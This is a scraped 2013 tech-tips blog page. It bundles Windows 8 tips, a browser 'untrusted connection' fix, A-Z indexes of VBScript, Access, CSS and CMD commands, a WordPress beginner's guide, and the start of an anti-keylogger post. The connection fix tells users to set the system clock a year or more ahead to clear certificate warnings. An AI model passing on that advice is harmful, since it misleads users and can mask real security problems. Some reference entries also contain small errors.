Questions? Feedback? powered by Olark live chat software 2013 | BM TRICKS 1

Windows 8 Tips And Tricks

Monday 23 December 2013

1. Put "God Mode" in easy reach

Windows 8 practically bristles with settings you can customize. The problem is that they're scattered throughout Windows 8, and it can be time-consuming to track them down individually.

However, there is one way to find them all in one place: You can use what some people call "God Mode." While the term "God Mode" has a powerful ring to it, the truth is it's not a separate mode that you put Windows into. It's really a hidden folder that gives you fast access to many settings spread out across Windows 8. It's easy to put that folder right on the Desktop.

First, make sure that you can view hidden files in File Explorer, the system navigation app that in earlier versions of Windows was called Windows Explorer. Run File Explorer, click the View tab, and check the boxes next to "Hidden items" and "File name extensions" in the Ribbon at the top.

Then right-click the Desktop and select New --> Folder. That creates a folder on the Desktop named "New folder." Rename the folder:

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}



The GodMode folder on the Desktop.
The folder icon changes, and it has the name GodMode.
(Note that the "GodMode" text isn't what turns the folder into a special folder; instead, it's that long string of letters and numbers inside the curly brackets. You can use any text you want before the period just ahead of the opening bracket, and it still points to the same folder and everything works the same.)

Double-click the icon, and you'll launch a folder filled with dozens of actions, tools and tweaks, from "Change Automatic Maintenance settings" to "View update history." They're organized by category. Expand or shrink each category by clicking the small triangle next to it. Each category displays a number next to it, showing how many settings there are in it.


"God Mode" offers a plethora of settings and actions.

To start any action or tweak, double-click it in the list. In some cases you'll follow a wizard, in other cases you'll need to fill in dialog boxes, and in yet other cases you'll be sent to the Control Panel or another Windows location to do the work.

2. Put a quick-and-dirty Start menu on the taskbar


Particularly high on the list of things that annoy people about Windows 8 is the omission of the Desktop's Start menu. Microsoft did its best to stomp it to death -- but it didn't quite succeed. In the Windows 8 cheat sheet I showed you how to use free or paid add-on programs to get the Start button and menu back.

If don't want to use third-party software to get a Start menu, you can build your own quick-and-dirty one in no time. You won't get the full traditional Windows Start menu with Search button, recently run apps, the Control Panel, your network and so on. Instead you get a menu that lets you browse through applications and launch them.

First make sure that you can view hidden files in File Explorer, as outlined in the tip above.

Now right-click the Desktop's taskbar and select Toolbars --> New Toolbar. From the screen that appears, navigate to

C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu


where username is your account name, and click the Select Folder button. That will place a Start Menu toolbar on the far right of the taskbar. Click its double arrow to display a variety of folders (such as Programs and Computer) that you can browse through until you see the item you want; click it to launch it.

start menu approximation



Here's your quick-and-dirty Start menu. To make the Start Menu toolbar go away, right-click the taskbar and select Toolbars, then de-select the Start Menu listing.
- See more at: http://onlinesafetricks.blogspot.com/2013/06/windows-8-tips-and-tricks.html#sthash.52ERrqY3.dpuf




Web Browser Shows Untrusted Connection (SOLVED)

Today a friend of mine told me that he gets a notification in his Web Browser when he tries to open Google showing This Connection Is Untrusted





So, today I am going to tell you how to solve this problem.

Steps To Solve The Problem-



  • Check your Computer's date and time.
  • If its wrong, correct it.
  • If it is correct then follow the next step.
  • Click on the time on the right bottom taskbar.
  • Click on change date and time settings....
  • Click on Change date and time.
  • If the UAC prompts, click on Yes.
  • Increase the Year. (eg.- If its 2013, change it to 2014 or more).
  • Click on OK an the date will be saved.
  • Now try reloading the website.
Wow, its done.......Enjoy.....
If it doesn't work, don't forget to tell me....

Check The Video For Understanding More Clearly......


A to Z Index For Some Commands

Friday 15 November 2013



An A-Z Index of Windows VBScript commands



   Abs(number)     Absolute (positive) value of number
.AppActivate Activate running command
Array(el1,el2,el3) Add values to an Array variable
Arguments Command line arguments
Asc(String) Return ASCII code for string
AscW(String) Return Unicode code for string
.BrowseForFolder Prompt the user to select a folder
c
Call subroutine (arguments) or subroutine arguments
CBool(expression) Convert expression to Boolean (True/False) •
CByte(expression) Convert expression to Byte (0-255) •
CCur(expression) Convert expression to Currency (numeric) •
CDate(expression) Convert expression to Date •
CDbl(expression) Convert expression to Double (up to 1.79x10308) •
Chr(ChrCode) Return the string character for ChrCode (ASCII code)
ChrB(ChrCode) Return the string character for ChrCode (Byte code)
ChrW(ChrCode) Return the string character for ChrCode (Unicode/DBCS)
CInt(expression) Convert expression to Integer •
CLng(expression) Convert expression to long •
CSng(expression) Convert expression to single •
CStr(expression) Convert expression to a string •
.CreateObject Create an automation object / run an external command
.CreateShortcut Create Shortcut
cscript Run a VBScript .vbs file
.CurrentDirectory Retrieve or change the current directory
d
Date() The current system date
DateAdd Add a time interval to a Date
DateDiff Return the time interval between two dates
DatePart Return part of a given date
DateSerial Return a Date from a numeric Year, Month and Day
DateValue Return a Date from a string expression
Day(date) Return the day component of date (1-31)
Dim Declare a new variable or array variable
Do..Loop Repeat a block of statements
Drives
Drive Map .MapNetworkDrive - .Enum - .Remove
e
.Echo Echo text to screen, also StdOut.Write /.Popup
End End a procedure or code block
Environment Variables - Expand - .Delete/Remove
Escape(String) Return only ASCII characters from a Unicode string.
Eval(expr) Evaluate an expression
.Exec Run a command
Exp(n) Return e (base of natural logs) raised to a power n.
Exit Exit a block of code immediately
f
FileSystemObject Work with Drives, Folders and Files
Filter Produce an array by filtering an existing array
Fix(number) Return the integer portion of a number
For...Next Repeat a block of statements a given number of times
For Each... Loop through the items in a collection or array
FormatCurrency Format a number with a currency symbol
FormatNumber Format a number
FormatPercent Format a number with a % symbol
FormatDateTime Format a Date/Time value
Function Define a function procedure
g
GetLocale() Return the Regional LocaleID
.GetObject Get an Automation object
h
Hex(number) Return the hex value of number
Hour(time) Return the hour component of time
i
If..Then Conditionally execute a block of statements
InputBox Prompt for user input
InStr Find one string within another
InStrRev Find one string within another, starting from the end
Int(number) Return the integer portion of a number
IsArray(varname) Is varname an array?
IsDate(expression) Is expression a DateTime?
IsEmpty(expression) Is expression initialised?
IsNull(expression) Is expression NULL?
IsNumeric(expression) Is expression a Numeric?
IsObject(expression) Is expression an object?
Join Combine the contents of an array into a single variable.
l
LBound Return the smallest subscript for an array.
LCase(String) Return String in lower case
Left(String,len) Return the leftmost len characters of string
LeftB(String,len) Return the leftmost len bytes of string
Len(String) Return length of string in characters
LenB(String) Return length of string in Bytes
Log(number) Return natural log of number
.LogEvent Log an item in the Event log
LTrim(String) Remove any leading spaces from a string expression
m
.MapNetworkDrive Drive Map
Mid Return a mid-section from a string
Minute(time) Return the minute component of time
Month(date) Return the month component of date
MonthName Convert a month number to a descriptive Month
MsgBox Display a dialogue box message
Now Return the current Date and Time
o
On Error Error handling
Option Explicit Force all variables to be defined
p
.AddPrinterConn / .AddWindowsPrConn Add Printer connection
.EnumPrinterConnections List Printer connections
.SetDefaultPrinter Set default printer
.RemovePrinterConnection Remove printer connection
Private VarName Declare a local variable/array variable
Public VarName Declare a public variable/array variable
q
.Quit Quit
r
Randomize(number) Initialise the random number generator
.ReadLine Accept user text input
ReDim Resize a dynamic array
RegExp Regular expression search object
.RegDelete Registry, delete
.RegRead Registry, read
.RegWrite Registry, write
REM Add a Comment
Replace Find and replace text
RGB(Red,Green,Blue) Return a system color code
Right(String,len) Return the rightmost len characters of string
RightB(String,len) Return the rightmost len bytes of string
Rnd Return a random number
Round Round a number to n decimal places
RTrim(String) Remove any trailing spaces from a string expression
.Run a command
s
Second(time) Return the second component of time
Select...Case Conditionally execute a block of statements
.SendKeys
Set variable = object Assign an object reference
SetLocale(LocaleID) Set the Regional LocaleID
Sgn(number) The sign of a number
.ShellExecute Run a script/application in the Windows Shell
Shortcut create .CreateShortcut
.Sleep
Space Return a string consisting of spaces.
.SpecialFolders Path to Desktop,Start menu, Programs...
Split Parse a string of delimited values into an array
Sqr(number) Square root
StrComp Compare two strings
String Create a string with a single character repeated
StrReverse Reverse a string
Sub Declare a sub procedure
t
Time() The current system time
Timer() The number of seconds since midnight
TimeSerial Construct a Time value from Hours, Minutes and seconds
TimeValue Convert a string to a Time value
Trim(String) Remove leading and trailing spaces from string
TypeName Return variable type (variant subtype).
u
UBound Return the largest subscript for an array dimension
UCase(String) Uppercase String
UnEscape(Str) Return Unicode characters from an escaped ASCII string
w
Weekday Return the day of the week (1-7)
WeekdayName Return the named day of the week
While...Wend Conditionally repeat a block of
statements
With Assign multiple properties of an object
Year(date) Return the year component of date (1-12)
' Remark Add a Comment
• All VBScript variables are variants the conversion functions set the variant subtype (an internal flag indicating the DataType) .


An A-Z Index of Microsoft Access commands and functions


a
Abs The absolute value of a number (ignore negative sign).
.AddMenu Add a custom menu bar/shortcut bar.
.AddNew Add a new record to a recordset.
.ApplyFilter Apply a filter clause to a table, form, or report.
Array Create an Array.
Asc The Ascii code of a character.
AscW The Unicode of a character.
Atn Display the ArcTan of an angle.
Avg (SQL) Average.
b
.Beep (DoCmd) Sound a tone.
.BrowseTo(DoCmd) Navigate between objects.
c
Call Call a procedure.
.CancelEvent (DoCmd) Cancel an event.
.CancelUpdate Cancel recordset changes.
Case If Then Else.
CBool Convert to boolean.
CByte Convert to byte.
CCur Convert to currency (number)
CDate Convert to Date.
CVDate Convert to Date.
CDbl Convert to Double (number)
CDec Convert to Decimal (number)
Choose Return a value from a list based on position.
ChDir Change the current directory or folder.
ChDrive Change the current drive.
Chr Return a character based on an ASCII code.
.ClearMacroError (DoCmd) Clear MacroError.
.Close (DoCmd) Close a form/report/window.
.CloseDatabase (DoCmd) Close the database.
CInt Convert to Integer (number)
CLng Convert to Long (number)
Command Return command line option string.
.CopyDatabaseFile(DoCmd) Copy to an SQL .mdf file.
.CopyObject (DoCmd) Copy an Access database object.
Cos Display Cosine of an angle.
Count (SQL) Count records.
CSng Convert to Single (number.)
CStr Convert to String.
CurDir Return the current path.
CurrentDb Return an object variable for the current database.
CurrentUser Return the current user.
CVar Convert to a Variant.
d
Date The current date.
DateAdd Add a time interval to a date.
DateDiff The time difference between two dates.
DatePart Return part of a given date.
DateSerial Return a date given a year, month, and day.
DateValue Convert a string to a date.
DAvg Average from a set of records.
Day Return the day of the month.
DCount Count the number of records in a table/query.
Delete (SQL) Delete records.
.DeleteObject (DoCmd) Delete an object.
DeleteSetting Delete a value from the users registry
.DoMenuItem (DoCmd) Display a menu or toolbar command.
DFirst The first value from a set of records.
Dir List the files in a folder.
DLast The last value from a set of records.
DLookup Get the value of a particular field.
DMax Return the maximum value from a set of records.
DMin Return the minimum value from a set of records.
DoEvents Allow the operating system to process other events.
DStDev Estimate Standard deviation for domain (subset of records)
DStDevP Estimate Standard deviation for population (subset of records)
DSum Return the sum of values from a set of records.
DVar Estimate variance for domain (subset of records)
DVarP Estimate variance for population (subset of records)
e
.Echo Turn screen updating on or off.
Environ Return the value of an OS environment variable.
EOF End of file input.
Error Return the error message for an error No.
Eval Evaluate an expression.
Execute(SQL/VBA) Execute a procedure or run SQL.
Exp Exponential e raised to the nth power.
f
FileDateTime Filename last modified date/time.
FileLen The size of a file in bytes.
.FindFirst/Last/Next/Previous Record.
.FindRecord(DoCmd) Find a specific record.
First (SQL) Return the first value from a query.
Fix Return the integer portion of a number.
For Loop.
Format Format a Number/Date/Time.
FreeFile The next file No. available to open.
From Specify the table(s) to be used in an SQL query.
FV Future Value of an annuity.
g
GetAllSettings List the settings saved in the registry.
GetAttr Get file/folder attributes.
GetObject Return a reference to an ActiveX object
GetSetting Retrieve a value from the users registry.
.GoToPage Move to a page on the current form.
.GoToRecord (DoCmd)Move to a specific record in a dataset.
h
Hex Convert a number to Hex.
Hour Return the hour of the day.
.Hourglass (DoCmd) Display the hourglass icon.
HyperlinkPart Return information about data stored as a hyperlink.
i
If Then Else If-Then-Else
IIf If-Then-Else function.
Input Return characters from a file.
InputBox Prompt for user input.
Insert (SQL) Add records to a table (append query).
InStr Return the position of one string within another.
InstrRev Return the position of one string within another.
Int Return the integer portion of a number.
IPmt Interest payment for an annuity
IsArray Test if an expression is an array
IsDate Test if an expression is a date.
IsEmpty Test if an expression is Empty.
IsError Test if an expression is returning an error.
IsMissing Test if a missing expression.
IsNull Test for a NULL expression.
IsNumeric Test for a valid Number.
IsObject Test if an expression is an Object.
L
Last (SQL) Return the last value from a query.
LBound Return the smallest subscript from an array.
LCase Convert a string to lower-case.
Left Extract a substring from a string.
Len Return the length of a string.
LoadPicture Load a picture into an ActiveX control.
Loc The current position within an open file.
.LockNavigationPane(DoCmd) Lock the Navigation Pane.
LOF The length of a file opened with Open()
Log Return the natural logarithm of a number.
LTrim Remove leading spaces from a string.
m
Max (SQL) Return the maximum value from a query.
.Maximize (DoCmd) Enlarge the active window.
Mid Extract a substring from a string.
Min (SQL) Return the minimum value from a query.
.Minimize (DoCmd) Minimise a window.
Minute Return the minute of the hour.
MkDir Create directory.
Month Return the month for a given date.
MonthName Return a string representing the month.
.Move Move through a Recordset.
.MoveFirst/Last/Next/Previous Record
.MoveSize (DoCmd) Move or Resize a Window.
MsgBox Display a message in a dialogue box.
n
Next Continue a for loop.
Now Return the current date and time.
Nz Detect a NULL value.
o
Oct Convert an integer to Octal.
OnClick, OnOpen Events.
.OpenForm (DoCmd) Open a form.
.OpenRecordset Create a new Recordset.
.OpenReport (DoCmd) Open a report.
.OutputTo (DoCmd) Export to a Text/CSV/Spreadsheet file.
p
Partition (SQL) Locate a number within a range.
.PrintOut (DoCmd) Print the active object (form/report etc.)
q
Quit Quit Microsoft Access
r
.RefreshRecord (DoCmd) Refresh the data in a form.
.Rename (DoCmd) Rename an object.
.RepaintObject (DoCmd) Complete any pending screen updates.
Replace Replace a sequence of characters in a string.
.Requery Requery the data in a form or a control.
.Restore (DoCmd) Restore a maximized or minimized window.
RGB Convert an RGB color to a number.
Right Extract a substring from a string.
Rnd Generate a random number.
Round Round a number to n decimal places.
RTrim Remove trailing spaces from a string.
.RunCommand Run an Access menu or toolbar command.
.RunDataMacro (DoCmd) Run a named data macro.
.RunMacro (DoCmd) Run a macro.
.RunSavedImportExport (DoCmd) Run a saved import or export specification.
.RunSQL (DoCmd) Run an SQL query.
s
.Save (DoCmd) Save a database object.
SaveSetting Store a value in the users registry
.SearchForRecord(DoCmd) Search for a specific record.
Second Return the seconds of the minute.
Seek The position within a file opened with Open.
Select (SQL) Retrieve data from one or more tables or queries.
Select Into (SQL) Make-table query.
Select-Subquery (SQL) SubQuery.
.SelectObject (DoCmd) Select a specific database object.
.SendObject (DoCmd) Send an email with a database object attached.
SendKeys Send keystrokes to the active window.
SetAttr Set the attributes of a file.
.SetDisplayedCategories (DoCmd) Change Navigation Pane display options.
.SetFilter (DoCmd) Apply a filter to the records being displayed.
SetFocus Move focus to a specified field or control.
.SetMenuItem (DoCmd) Set the state of menubar items (enabled /checked)
.SetOrderBy (DoCmd) Apply a sort to the active datasheet, form or report.
.SetParameter (DoCmd) Set a parameter before opening a Form or Report.
.SetWarnings (DoCmd) Turn system messages on or off.
Sgn Return the sign of a number.
.ShowAllRecords(DoCmd) Remove any applied filter.
.ShowToolbar (DoCmd) Display or hide a custom toolbar.
Shell Run an executable program.
Sin Display Sine of an angle.
SLN Straight Line Depreciation.
Space Return a number of spaces.
Sqr Return the square root of a number.
StDev (SQL) Estimate the standard deviation for a population.
Str Return a string representation of a number.
StrComp Compare two strings.
StrConv Convert a string to Upper/lower case or Unicode.
String Repeat a character n times.
Sum (SQL) Add up the values in a query result set.
Switch Return one of several values.
SysCmd Display a progress meter.
t
Tan Display Tangent of an angle.
Time Return the current system time.
Timer Return a number (single) of seconds since midnight.
TimeSerial Return a time given an hour, minute, and second.
TimeValue Convert a string to a Time.
.TransferDatabase (DoCmd) Import or export data to/from another database.
.TransferSharePointList(DoCmd) Import or link data from a SharePoint Foundation site.
.TransferSpreadsheet (DoCmd) Import or export data to/from a spreadsheet file.
.TransferSQLDatabase (DoCmd) Copy an entire SQL Server database.
.TransferText (DoCmd) Import or export data to/from a text file.
Transform (SQL) Create a crosstab query.
Trim Remove leading and trailing spaces from a string.
TypeName Return the data type of a variable.
u
UBound Return the largest subscript from an array.
UCase Convert a string to upper-case.
Union (SQL) Combine the results of two SQL queries.
Update (SQL) Update existing field values in a table.
.Update Save a recordset.
v
Val Extract a numeric value from a string.
Var (SQL) Estimate variance for sample (all records)
VarP (SQL) Estimate variance for population (all records)
VarType Return a number indicating the data type of a variable.
w
Weekday Return the weekday (1-7) from a date.
WeekdayName Return the day of the week.
y
Year Return the year for a given date.

An A-Z Index of CSS properties

  animation    -name, -duration, -timing-function -delay -iteration-count -direction -fill-mode CSS3
background -Attachment -Color -Image -Repeat -Position
background-Clip The painting area of the background. CSS3
background-Origin The positioning area of the background images. CSS3
background-Size The size of the background images. CSS3
bookmark-label Label a bookmark. CSS3
bookmark-target Target of a bookmark link. CSS3

border -color -style -width Set all 4 borders.
border-bottom -bottom-width -bottom-style -bottom-color
border-left -left-width -left-style -left-color
border-right -right-width -right-style -right-color
border-top -top-width -top-style -top-color
border-collapse Collapse table borders.
border-spacing Distance between the borders of adjacent cells.
border-image Set a border image. CSS3
border-radius -top-left-radius -top-right-radius -bottom-left-radius -bottom-right-radius CSS3
bottom Bottom position of a positioned element
box-align Align the child elements of a box. CSS3
box-direction The direction in which children of a box are displayed. CSS3
box-flex Whether the children of a box are flexible or inflexible in size. CSS3
box-ordinal-group Display order of the child elements of a box. CSS3
box-orient Position child elements horizontally or vertically. CSS3
box-pack Define the horizontal or vertical position or a box.
CSS3
box-shadow Attach one or more drop-shadows to the box. CSS3
box-sizing The CSS box model used to calculate the height and width of elements. CSS3
c
clear Set sides of an element where other floating elements are not allowed
clip Clip an absolutely positioned image/element.
color Text color
column-gap Gap between the columns. CSS3
column-rule -rule-color -rule-style -rule-width CSS3
column-span How many columns an element should span across. CSS3
columns -width -count CSS3
content Insert generated content before or after an element.
counter-increment Increment one or more counters. CSS3
counter-reset Create or reset one or more counters. CSS3
crop Allow a replaced element to be a cropped area of the whole object. CSS3
cursor The type of cursor to be displayed.
d
direction The text reading direction, left-to-right or right-to-left.
display How to display an HTML element.
f
float Shift to the left (or right) allowing other content to flow/wrap alongside.
font -family -size -style(italic/normal) -variant(small-caps) -weight(Normal/bold)
@font-face Download and use a web font.
font-size-adjust Attempt to normalise the font size. CSS3
font-stretch Select a normal, condensed, or expanded font face. CSS3
g
grid-columns Width of each column in a grid. CSS3
grid-rows Height of each column in a grid.
CSS3
h
height Height of an element.
max-height Maximum height of an element.
min-height Minimum height of an element.
hyphens How to split words to improve the paragraph layout. CSS3
l
left Left position of a positioned element.
Letter-Spacing Increase or decrease the space between characters.
line-height Line height.
list-style -image -position -type list-item markers.
m
margin -top -right -bottom -left
marquee -direction -play-count -speed -style Moving content.
max-width Maximum width of an element.
min-width Minimum width of an element.
o
opacity Opacity level for an element. CSS3
outline -color -style -width
outline-offset Offset an outline, and draw it beyond the border edge. CSS3
overflow What happens if content overflows an element's box.
overflow-x Whether to clip the left/right edges of overflowing content. CSS3
overflow-y Whether to clip the top/bottom edges of overflowing content. CSS3
text-overflow What should happen when text overflows the containing element. CSS3
p
padding -bottom -left -right -top
page-break-after Adjust page breaks after the current element.
page-break-before Adjust page breaks before the current element.
position Positioning method for an element. (static, relative, absolute or fixed)
q
quotes Type of quotation marks for embedded quotations.
r
right Right position of a positioned element.
t
table-layout How to layout table columns.
top Top position of a positioned element.
text-align Horizontal alignment of text.
text-decoration Add decoration to text.
text-indent Indent the first line in a text-block.
text-overflow What should happen when text overflows the containing element. CSS3
text-shadow Add a shadow to text. CSS3
text-transform Change the capitalization of text.
text-align-last How to align the last line of text. CSS3
text-justify Justification method used when text-align is "justify". CSS3
transform Apply a 2D or 3D transformation to an element. CSS3
transform-origin Change the position of transformed elements. CSS3
transform-style How nested elements are rendered in 3D space. CSS3
transition -property -duration -timing-function -delay CSS transition effects. CSS3
u
unicode-bidi Control the inline direction of text.
user-select Control the selection of text.
vertical-align Vertical alignment of an image/element.
visibility Hide or show an element.
w
white-space How white-space inside an element is handled.
word-spacing Increase or decrease the space between words in a text.
width Width of an element.
max-width Maximum width of an element.
min-width Minimum width of an element.
z-index Stack order of a positioned element.
/* This is a CSS comment */
Bold = Shortcut property Grey = very limited web browser support.

An A-Z Index of the Windows CMD command line

   ADDUSERS Add or list users to/from a CSV file
ADmodcmd Active Directory Bulk Modify
ARP Address Resolution Protocol
ASSOC Change file extension associations•
ASSOCIAT One step file association
AT Schedule a command to run at a specific time
ATTRIB Change file attributes
b
BCDBOOT Create or repair a system partition
BCDEDIT Manage Boot Configuration Data
BITSADMIN Background Intelligent Transfer Service
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
c
CACLS Change file permissions
CALL Call one batch program from another•
CERTREQ Request certificate from a certification authority
CERTUTIL Utility for certification authority (CA) files and services
CD Change Directory - move to a specific Folder•
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard
CLS Clear the screen•
CLUSTER Windows Clustering
CMD Start a new CMD shell
CMDKEY Manage stored usernames/passwords
COLOR Change colors of the CMD window•
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS
COPY Copy one or more files to another location•
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data
d
DATE Display or set the date•
DEFRAG Defragment hard drive
DEL Delete one or more files•
DELPROF Delete user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders•
DIRUSE Display disk usage
DISKPART Disk Administration
DISKSHADOW Volume Shadow Copy Service
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DriverQuery Display installed device drivers
DSACLs Active Directory ACLs
DSAdd Add items to active directory (user group computer)
DSGet View items in active directory (user group computer)
DSQuery Search for items in active directory (user group computer)
DSMod Modify items in active directory (user group computer)
DSMove Move an Active directory Object
DSRM Remove items from Active Directory
e
ECHO Display message on screen•
ENDLOCAL End localisation of environment changes in a batch file•
ERASE Delete one or more files•
EVENTCREATE Add a message to the Windows event log
EXIT Quit the current script/routine and set an errorlevel•
EXPAND Uncompress files
EXTRACT Uncompress CAB files
f
FC Compare two files
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files•
FOR /F Loop command: against the results of another command•
FOR Loop command: all options Files, Directory, List•
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE File extension file type associations•
g
GETMAC Display the Media Access Control (MAC) address
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line•
GPRESULT Display Resultant Set of Policy information
GPUPDATE Update Group Policy settings
h
HELP Online Help
i
iCACLS Change file and folder permissions
IF Conditionally perform a command•
IFMEMBER Is the current user a member of a Workgroup
IPCONFIG Configure IP
k
KILL Remove a program from memory
l
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the event viewer
LOGMAN Manage Performance Monitor
LOGOFF Log a user off
LOGTIME Log the date and time in a file
m
MAPISEND Send email from the command line
MBSAcli Baseline Security Analyzer
MEM Display memory usage
MD Create new folders•
MKLINK Create a symbolic link (linkd) •
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another•
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO32 System Information
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MV Copy in-use files
n
NET Manage network resources
NETDOM Domain Manager
NETSH Configure Network Interfaces, Windows Firewall & Remote access
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
o
OPENFILES Query or display open files
p
PATH Display or set a search path for executable files•
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message•
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Return to a previous directory saved by PUSHD•
PORTQRY Display the status of ports and services
POWERCFG Configure power settings
PRINT Print a text file
PRINTBRM Print queue Backup/Recovery
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt•
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsPing Measure network performance
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory•
q
QGREP Search file(s) for lines that match a given pattern
Query Process Display processes (TS/Remote Desktop)
Query Session Display all sessions (TS/Remote Desktop)
Query TermServer List all servers (TS/Remote Desktop)
Query User Display user sessions (TS/Remote Desktop)
r
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk
REG Registry: Read, Set, Export, Delete keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file•
REN Rename a file or files•
REPLACE Replace or update one file with another
Reset Session Delete a Remote Desktop Session
RD Delete folder(s)•
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUN Start | RUN commands
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

s
SC Service Control
SCHTASKS Schedule a command to run at a specific time
SCLIST Display Services
SET Display, set, or remove session environment variables•
SETLOCAL Control the visibility of environment variables•
SETX Set environment variables
SFC System File Checker
SHARE List or edit a file share or print share
ShellRunAs Run a command under a different user account
SHIFT Shift the position of batch file parameters•
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SLMGR Software Licensing Management (Vista/2008)
SOON Schedule a command to run in the near future
SORT Sort input
START Start a program, command or batch file•
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
t
TAKEOWN Take ownership of a file
TASKLIST List running applications and services
TASKKILL Remove a running process from memory
TIME Display or set the system time•
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session•
TLIST Task list with full path
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TSDISCON Disconnect a Remote Desktop Session
TSSHUTDN Remotely shut down or reboot a terminal server
TYPE Display the contents of a text file•
TypePerf Write performance data to a log file
u
USRSTAT List domain usernames and last login
v
VER Display version information•
VERIFY Verify that files have been saved•
VOL Display a disk label•
w
WAITFOR Wait for or send a signal
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSDP Windows system report
WINRM Windows Remote Management
WINRS Windows Remote Shell
WMIC WMI Commands
WUAUCLT Windows Update
x
XCACLS Change file and folder permissions
XCOPY Copy files and folders
:: Comment / Remark•
Commands marked • are Internal commands only available within the CMD shell.
All other commands (not marked with •) are external commands.
External commands may be used under the CMD shell, PowerShell, or directly from START-RUN.

A Beginner’s Guide for Designing a Website

Friday 18 October 2013

Beginner’s Guide for Designing a Website

If you want to design your own website yet know nothing about web design, do not despair. You could spend weeks or months learning how to build your own website from scratch, or you could choose the easier route and go with a content management system like Blogger or WordPress. Almost any blogging platform is acceptable you only want to make a blog. However, if you want to use these systems to design any other type of website, WordPress is by far the best choice. These platforms make it much easier for anyone to make their own blog or website, so they are an ideal option for beginners.

Designing from Scratch is a bit Tough



Unless you already have a lot of technical expertise in HTML, CSS, Java and other programming languages, you should not try to tackle building a website from scratch on your own. Doing the code work necessary to build your own site is far too complicated for most amateur web designers. If you aren’t already a web designer, you are better off hiring one to do the job for you if you decide you want to build a site from scratch. Building a website is something that takes a great deal of time and effort, and even a small site can easily cost thousands of dollars when designed by a professional. You might be able to skip this hassle and expense entirely and go with a content management system like WordPress instead.

Designing a Website Using WordPress


WordPress is one of the best platforms there, and you can even use it for free. There are many free templates that you can use to make your own blog or website, or you can choose one of several WordPress themes for a small fee. The sky is the limit when it comes to template design. The biggest advantage for beginners is that you do not need any expertise in coding or web programming to get started. You don’t even have to be that good with technology in general to set up your blog or site. The theme has all the code needed for building the site built in. All you have to do is set it up how you like it, remove the features you don’t want, and start adding your own content. Designing a simple blog in WordPress can be done in under an hour, but you may spend far more of your time looking at all of the different choices of themes and designs.

Customize Your Site with Added Features

WordPress is an open-source system, which means that people are constantly creating new features for the platform each day. Software developers have designed thousands of plugins for WordPress, many of which are available for you to use for free. Plugins do everything from help you manage spam to optimize your site for search engines. They are a true asset to anyone who is trying to build their own blog without any knowledge of web design. You can find a plugin to do just about anything, and you won’t have to learn the code necessary to do it yourself.

Free or Paid WordPress Site

If you want, your WordPress blog or website can be entirely free. You can host your site on WordPress.com, choose a free theme, and use any free plugins you can find. Many people build popular blogs or sites of their own without ever spending a dime. However if you are willing to spend a little of your hard earned money, you can make a much bigger impact. If you are willing to pay for a domain and hosting you can host the site wherever you want. You can also go for a more sophisticated and intricate design using a premium WordPress theme.

Download NextGen Anti-Keylogger

Protect Your PC From Harmful Keyloggers


Today I am going to provide you a freeware anti-keylogger.

The threat: Keyloggers as means of stealing information. 

Information stealing exists since early days of the World Wid Web. Unfortunately, various kinds of white-collar crime aimed at stealing valuable (in the direct sense) information thrive in cyberspace. The scale of these crimes varies from harvesting email addresses for spammers to identity theft and espionage. 

